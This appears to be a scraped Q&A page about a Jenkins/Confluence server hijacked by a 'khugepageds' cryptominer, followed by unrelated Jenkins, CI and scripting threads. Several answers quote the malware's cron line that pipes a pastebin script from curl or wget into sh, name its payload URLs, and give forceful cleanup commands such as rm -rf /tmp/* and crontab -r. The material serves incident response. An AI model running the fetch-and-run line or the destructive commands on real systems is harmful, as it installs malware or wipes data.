Jenkins High CPU Usage Khugepageds - jenkins

The picture above shows a process, khugepageds, that uses 98 to 100% of the CPU at times.
I tried to find out how Jenkins uses this process, or what to do about it, but was not successful.
I did the following:
pkill jenkins
service jenkins stop
service jenkins start
When I pkill, of course the usage goes down, but once I restart Jenkins it is back up again.
Has anyone had this issue before?

So, we just had this happen to us. Following the other answers, and after some digging of our own, we were able to kill the process (and keep it killed) by running the following command:
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).

Yes, we were also hit by this vulnerability. Thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which seems to start a cron process on the system; it will try again to get escalated access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron jobs and remove the ones that seem suspicious, then restart the VM.
The vulnerability adds an unwanted executable to the /tmp folder and tries to access the VM via SSH.
It also adds a cron job on your system; make sure to remove that as well.
Also check the ~/.ssh folder, in particular known_hosts and authorized_keys, for any suspicious SSH public keys. The attacker can add their own SSH keys to get access to your system.
Hope this helps.

This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
    return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does. It looks like a botnet controller.

This looks like a vulnerability. Look in the syslog (/var/log/syslog, not the Jenkins log) for an entry like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find one, stop Jenkins, clear the /tmp directory, and kill all processes started by the jenkins user.
Once CPU usage is back down, update to the latest LTS version of Jenkins. After starting Jenkins again, update all of its plugins.
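The syslog check described above could be sketched roughly as follows. The function name find_suspicious_cron and the regular expression are assumptions for illustration; the pattern only targets the "fetch with curl or wget, then pipe to a shell" shape quoted in this answer and may miss variants.

```shell
#!/bin/sh
# Print log lines where cron ran a "download and pipe to a shell" command.
# $1: log file to scan (defaults to /var/log/syslog, as named in the answer).
# find_suspicious_cron is a hypothetical helper, not part of any tool.
find_suspicious_cron() {
    log_file="${1:-/var/log/syslog}"
    # Match CRON entries that use curl or wget and end up piping into sh/bash.
    grep -E 'CRON.*(curl|wget).*\|[[:space:]]*(ba)?sh' "$log_file"
}
```

Calling find_suspicious_cron with no argument scans /var/log/syslog, which usually requires root or membership in the adm group. No output means no matching line was found; it does not prove the machine is clean.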

Because the cron file just gets recreated, a solution that works is to empty the jenkins user's cron file. I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
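A minimal sketch of those three steps, under stated assumptions: the answer does not name the file or the new owner, so the path (Debian/Ubuntu style /var/spool/cron/crontabs/jenkins) and the owner root:root are guesses, and lock_cron_file and DRY_RUN are hypothetical names. The dry-run mode prints the commands so they can be reviewed before anything is changed.

```shell
#!/bin/sh
# Empty a crontab file, hand it to root, and make it immutable.
# Assumptions: the new owner is root:root, and the filesystem supports
# chattr +i (ext4 and similar). Set DRY_RUN=1 to only print the commands.
lock_cron_file() {
    cron_file="$1"
    for cmd in "truncate -s 0" "chown root:root" "chattr +i"; do
        if [ "${DRY_RUN:-0}" = "1" ]; then
            echo "$cmd $cron_file"
        else
            # $cmd is intentionally unquoted so it splits into command and options.
            $cmd "$cron_file" || return 1
        fi
    done
}

# Example (as root), path assumed for Debian/Ubuntu:
#   lock_cron_file /var/spool/cron/crontabs/jenkins
```

To undo the immutable flag later, chattr -i on the same file removes it.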

In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
The problem was solved with @HeffZilla's solution.

Related

Script to automate timeshift backup and azuracast update

I’m running an Azuracast docker instance on Linode and want to try to find a way to automate my updates. Right now my routine is when I notice there are updates by accessing the Azuracast web panel, I usually run timeshift to create a backup using the following command
timeshift --create --comment "azuracast update"
And then I use the following to update azuracast
cd /var/azuracast/
./docker.sh update-self
./docker.sh update
Then it asks me to ensure the azuracast installation is backed up before updating, to which I would usually just press enter.
After that is completed, it asks me if I want to clean up all stopped docker containers and images to save space, which I usually say no to.
What I’m wondering is if there is a way to create a bash script, or python or something to automate all of this, and then have it run on a schedule?
Sure, you can write a shell script to execute these commands and then run it on a schedule using crontab(5).
For example your script might look like:
#! /bin/sh
# Back up with timeshift, then update AzuraCast
timeshift --create --comment "azuracast update" && \
cd /var/azuracast/ && \
./docker.sh update-self && \
(yes | ./docker.sh update)
It sounds like this docker.sh program takes some user inputs. See if there are options you can pass to it that will allow you to run it non-interactively. (Seems there isn't, see edit.)
To set up your cron job, you can put the script in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly. Or if you need more control, you can get started configuring a cron job with crontab -e.
EDIT: Assuming this is the script you're using, it doesn't seem to have a way to run update non-interactively. Fear not though, there's a program for this: yes(1). This will answer yes to both of the questions, but honestly running docker system prune -f is probably a good idea. If you really want to answer no to that, you could probably replace yes with printf "y\nn\n" to answer yes to the first and no to the second.
Also note that there's at least one other y/n question it could ask you, which you probably want to answer yes to.
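To illustrate how piping printf into an interactive program answers its prompts in order, here is a small sketch. fake_update is a hypothetical stand-in for the real updater (it just reads two answers and echoes them), and answer_update_prompts is likewise an invented helper name.

```shell
#!/bin/sh
# Hypothetical stand-in for an interactive updater that asks two y/n questions.
fake_update() {
    read -r backup_ok
    read -r prune_ok
    echo "backup confirmed: $backup_ok, prune: $prune_ok"
}

# Feed "y" to the first prompt and "n" to the second prompt of the given command.
answer_update_prompts() {
    printf 'y\nn\n' | "$@"
}

answer_update_prompts fake_update
# prints "backup confirmed: y, prune: n"
```

With the real script the call would look like answer_update_prompts ./docker.sh update, assuming it asks exactly those two questions in that order. If it asks an extra question, the answers shift, so it is worth checking a run by hand first.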

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and a GitLab Runner CI setup to deploy (synchronize) a bunch of JSON files to a server using LFTP. This job, however, seems to "freeze" for a few minutes roughly every 10 files. With roughly 400 files to synchronize at times, the job simply crashes because it can take more than an hour to complete. The JSON files are all 1 KB. Neither the source nor the target server should have a firewall rate limiting the FTP traffic. Both are hosted at OVH.
The following LFTP command is executed in order to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD@$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
The job is run in Docker, using this container to deploy everything. What could cause this?
For those of you coming from Google: we had the exact same setup. To get LFTP to stop hanging when running in Docker or some other CI environment, you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes sure LFTP won't wait forever or get into a continuous loop when it can't run a command. This should speed things along.
It makes sure we are using SSL/TLS. If you don't need this, remove those options.
It synchronizes one folder to the new location. The -Renv options are explained here: https://lftp.yar.ru/lftp-man.html
Lastly, in GitLab CI I set the job to retry if it fails. This will spin up a new Docker instance, which gets around any open file or connection limitations. The above LFTP command will run again, but since we are using the -n flag (only newer files) it will only transfer the files that were missed by the first job. This gets everything moved over without hassle. You can read more about CI job retries here: https://docs.gitlab.com/ee/ci/yaml/#retry
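If a CI-level retry is not available, a similar effect can be approximated inside the job script. This is a different technique from the GitLab retry described above (it reuses the same container rather than starting a fresh one), and the retry function below is a hypothetical helper, not something LFTP or GitLab provides.

```shell
#!/bin/sh
# Run a command up to $1 times, stopping at the first success.
# Returns 0 on success, 1 if every attempt failed.
retry() {
    max_attempts="$1"
    shift
    attempt=1
    while [ "$attempt" -le "$max_attempts" ]; do
        "$@" && return 0
        echo "attempt $attempt of $max_attempts failed" >&2
        attempt=$((attempt + 1))
    done
    return 1
}

# Example, with the lftp arguments from the answer abbreviated:
#   retry 3 lftp -c "set net:timeout 5; ...; mirror dist / -Renv --parallel=10"
```

Because the mirror command only transfers newer files, each repeated attempt should pick up where the previous one stopped rather than starting over.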
Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.

Starting Erlang service at boot time (using Relx for creating release)

I have a server written in Erlang, compiled with Rebar, and I make a release with Relx. It starts nicely with
/root/rel/share3/bin/share3 start
The next step is to start when the server boots.
I have tried different approaches, the last one is using the /etc/init.d/skeleton where I changed the following
NAME=share3
DAEMON=/root/rel/share3/bin/share3
DAEMON_ARGS="$1"
After that, I ran update-rc.d, but I have not gotten it to work (Ubuntu 14.04).
The service runs until the machine reboots, and then I need to log in and start it again.
For Windows, it is really elegant, since it can create the Windows service.
Ubuntu uses upstart as its init system, so you could try something like this:
description "Start my awesome service"
start on runlevel [2345]
stop on runlevel [!2345]
respawn
exec /root/rel/share3/bin/share3
You have to place this script in the /etc/init/ directory with a '.conf' extension, for example '/etc/init/share3.conf'. To start it, invoke sudo start share3.
At last, I solved it!
I told relx to place the result in /home/mattias/rel. The script generated by relx is /home/mattias/rel/share3/bin/share3.
Replace the row
SCRIPT_DIR="$(dirname "$0")"
by (you need to fix the path /home/mattias/rel)
HOME=/home/mattias
export HOME
SCRIPT_DIR="/home/mattias/rel/share3/bin"
Copy the file to /etc/init.d/share3 using
sudo cp ~/rel/share3/bin/share3 /etc/init.d/
Test that it works using
/etc/init.d/share3 start
and
/etc/init.d/share3 stop
In order to make it start at boot, install sysv-rc-conf
sudo apt-get install sysv-rc-conf
Enable start at boot using
sudo sysv-rc-conf share3 on
and disable
sudo sysv-rc-conf share3 off
Alternatives are welcome.

Jenkins installation - Unable to create the home directory despite its existence and writeability

I'm trying to install Jenkins on a Tomcat 7 container.
When I try to open the Jenkins web app I get following error:
Unable to create the home directory '/home/myuser/jenkins/work'. This is most
likely a permission problem.
To change the home directory, use JENKINS_HOME environment variable or set
the JENKINS_HOME system property. See Container-specific documentation for
more details of how to do this.
Before starting Tomcat, I did chmod uog+rwx /home/myuser/jenkins. So, I suppose that Jenkins should be able to create a subdirectory there.
But obviously it can't.
How can I fix this problem?
Update 1:
ls -lt returns
drwxrwxrwx 2 root ec2-user 4096 Jun 23 10:25 jenkins
for /home/myuser/jenkins. /home/myuser/jenkins/work doesn't exist because Jenkins is supposed to create it.
Update 2: Just tried to create the work directory and to run chmod uog+rwx on it. It didn't help.
Update 3: Additional information:
I need Jenkins in order to
run lengthy tests in the night (fast unit tests are run before every mvn install, slow tests are executed every night) and
save software quality metrics (checkstyle, PMD, FindBugs, unit test coverage etc.) over time.
I have only one machine available for that and there is a Tomcat7 container installed there already.
At the moment, I don't want to invest additional money into buying new machines.
The machine with the Tomcat7 container (and where I want Jenkins to be installed) is an Amazon EC2 microinstance (OS version is given below).
$ cat /etc/*-release
LSB_VERSION=base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Amazon Linux AMI release 2013.03
Update 4 (29.06.2013 13:34 MSK): The output of yum list does not contain any Jenkins/Hudson package.
If Tomcat is running as a separate user you will need to give execute permission to your home directory to that user - either by giving it to all or by creating a group especially for you and the tomcat user.
(UPDATE) More specifically: You say you already did chmod uog+rwx /home/myuser/jenkins. If Tomcat is not running as 'myuser', it also needs execute permission on /home and on /home/myuser to be able to open /home/myuser/jenkins. If you are not picky about other users on the system opening your home directory, you could allow this with: chmod a+x /home/myuser. (I'm assuming here that the permissions for /home are already OK.)
If you are running Tomcat as 'myuser', the filesystem permissions look fine, but Tomcat's own permission system might be the problem, as webapps are not allowed to touch the filesystem if the default settings of the security manager are on.
See: https://wiki.jenkins-ci.org/display/JENKINS/Tomcat
You don't specify more about your exact Tomcat/OS setup, so I can't give exact details, but the fast way to find out whether it's a security manager issue is to give AllPermission to your webapp. If you don't run in a safe environment, it is advisable to use that only as a test, and to set up only the permissions that are really needed later.
Run these three commands:
cd /usr/share/tomcat7
sudo mkdir .jenkins
sudo chown tomcat7:nogroup .jenkins
https://seleniumwithjavapython.wordpress.com/home/jenkins-installation/
It looks like the problem may be that jenkins cannot see /home/myuser, and therefore it cannot access the jenkins folder inside this (even though it has write permissions in /home/myuser/jenkins, I believe the fact it can't read /home/myuser causes a problem).
Try running the below command and then see if Jenkins works after that:
chmod +r /home/myuser
@robjohncox Yes - drwx------ 5 myuser myuser 4096 Jun 23 10:25 myuser
You must add +x to this directory to make it possible for Jenkins to access its contents. To be precise, the whole path has to have +x enabled for everyone.
Also, what commands did you use to move its home directory from the default? A possible error is somewhere there. Cheers, Piotr
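The "whole path needs +x" point can be checked with a short script. This is a sketch under assumptions: dirs_missing_search_bit is a hypothetical helper, it relies on GNU stat (the -c option), and it only looks at the "others" permission bits, so it ignores group membership and ACLs.

```shell
#!/bin/sh
# Print each directory on the way to $1 that lacks the execute (search)
# bit for "others". Assumes GNU stat, as found on typical Linux systems.
dirs_missing_search_bit() {
    dir="$1"
    while [ "$dir" != "/" ] && [ "$dir" != "." ]; do
        mode=$(stat -c '%A' "$dir") || return 1
        # Character 10 of a mode string such as "drwx------" is the
        # execute bit for others ("x", or "t" when the sticky bit is set).
        case "$mode" in
            ?????????[xt]*) ;;
            *) echo "$dir ($mode)" ;;
        esac
        dir=$(dirname "$dir")
    done
}

# Example: dirs_missing_search_bit /home/myuser/jenkins
```

For the permissions shown in this thread, the call would be expected to list /home/myuser, since its mode is drwx------. The util-linux command namei -l /home/myuser/jenkins shows the same per-component permissions in one listing.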

Running iOS UIAutomation tests from Jenkins

For a while now I've been trying to work out how to run UIAutomation tests from Jenkins. Every time I run the build, it builds fine, then it runs my instruments command (the same command as detailed in "Can Instruments be used using the command line?") and Jenkins just hangs. Well, the whole machine does, and when I look at Activity Monitor I can see an instruments process using 2 GB of memory.
When I set up Jenkins, I originally ran it as a hidden user. This presented some challenges, with Jenkins being a daemon and not being able to access the window server. I then decided to change the Jenkins account to a normal user, logged in and ran instruments from the command line. This worked fine, but I still had no luck running it from Jenkins.
I have set the Jenkins account as a developer, though not as an admin.
Please let me know if there's anything else that I could try. If anyone has got this running successfully, your guidance would be much appreciated. Thanks
Jenkins on OS X is started from a launchd script and will run as "daemon" by default. The thing to do is change the user in the launchd script.
First, get Jenkins ready to shutdown (in "Manage Jenkins" in the GUI).
Then unload the job from launchd, like so:
$ sudo launchctl unload /Library/LaunchDaemons/org.jenkins-ci.plist
Then edit the "UserName" property in the launchd plist, using the user which you want to run jenkins. There's also a GroupName property, which you may want/need to adjust accordingly with your user's group.
Finally, reload Jenkins with:
$ sudo launchctl load /Library/LaunchDaemons/org.jenkins-ci.plist
Hope that helps!
So if you run it as a daemon, the first thing to check is what happens if you run Jenkins in the foreground. The simplest way to do that is with the java -jar jenkins.war [other options] command (see this document).
Maybe you can use this https://github.com/houlianpi/robot4ios.
Then, in the Jenkins "Execute shell" build step:
sh setup.sh
sh runTests.sh ./sample/alltests.js "/Users/komejun/Library/Application Support/iPhone Simulator/5.0/Applications/1622F505-8C07-47E0-B0F0-3A125A88B329/Recipes.app/"
and the report will be created automatically in ./ynmsk-report/test.xml
